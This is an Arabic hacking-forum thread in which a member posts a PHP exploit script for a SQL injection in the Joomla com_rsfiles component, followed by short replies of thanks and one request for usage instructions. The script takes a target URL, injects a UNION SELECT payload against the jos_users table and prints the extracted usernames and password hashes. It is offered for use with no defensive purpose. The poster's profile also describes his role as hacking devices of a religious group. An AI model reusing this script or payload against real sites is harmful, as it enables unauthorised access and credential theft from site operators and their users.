1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Dr.HaMoOoD | المشاهدات : 745 | الردود : 5
حالة الموضوع:
مغلق
  1. Dr.HaMoOoD

    Dr.HaMoOoD Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    اخترآق آجهزه آليهود
    الإقامة:
    Bahrain
    بسم الله الرحمان الرحيم
    أنا قاعد فارغ وقت وجدت إحدى الثغرات في جملة و منتشرة في مواقع كثيرة لاكن الأستغلال خرطي
    فقمت بكتابة إستغلال بسيط للثغرة

    [​IMG]
    كود PHP:
     <?php
    $too 
    $argv[0];
    echo
    "
    **************************************************
    com_rsfiles POc Sql                              *
    found by I dont now but exploit by Dr.HaMoOoD    *             *
    my firend and my home iq-team.org                *
    dork ===
    **************************************************
     http://www.site.com >>>>>>>"
    ;
    $site1 trim(fgets(STDIN,1024));
            
    $itz = array();
       if(isset(
    $site1)) {
    echo
    "
    chek ==>
    $site1
     "
    ;
    $exploit '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(0x47726f75705833,username,0x7c3a7c,password,0x47726f75705833)+from+jos_users--';
    $file = ($site1).($exploit);
    $get = @file_get_contents($file);
    if(
    $get) {
    preg_match("#GroupX3(.*?)GroupX3#" ,$get,$m);
    $all explode('|:|',$m[1]);
    $username $all[0];
    $password $all[1];
    echo 

    exploit DONE :
    username: 
    $username 
    password: 
    $password 
    \n
    "
    ;
     
            }else{echo
    "\n not VUn\n";};
            }
    ?> 
     
  2. ريلاكس ياقلبي

    ريلاكس ياقلبي Active DeveloPer

    الأنتساب:
    ‏12 نوفمبر 2012
    المشاركات:
    94
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: إستغلال لثغرة com_rsfiles في joomla

    الله يعطيك آلعآآفيةةة ...
     
  3. أمير عرش الدموع

    أمير عرش الدموع DeveloPer Plus

    الأنتساب:
    ‏25 يناير 2012
    المشاركات:
    111
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    IRAQ
    رد: إستغلال لثغرة com_rsfiles في joomla

    تسلم ايديك يابطل ..

    ربي يعطيك العافية والصحه يآرب
     
  4. Just for you

    Just for you DeveloPer Plus

    الأنتساب:
    ‏3 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: إستغلال لثغرة com_rsfiles في joomla

    بارك الله فيك حبيبي ^:"
     
  5. Dr.TaYeB

    Dr.TaYeB Developer

    الأنتساب:
    ‏22 ديسمبر 2013
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    Facebook:
    YouTube:
    رد: إستغلال لثغرة com_rsfiles في joomla

    ممكن تشرح لينا كيفية الاستغلال للثغرة pir+_"te2
     
  6. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: إستغلال لثغرة com_rsfiles في joomla

    )5:")5:")5:")5:")5:")5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة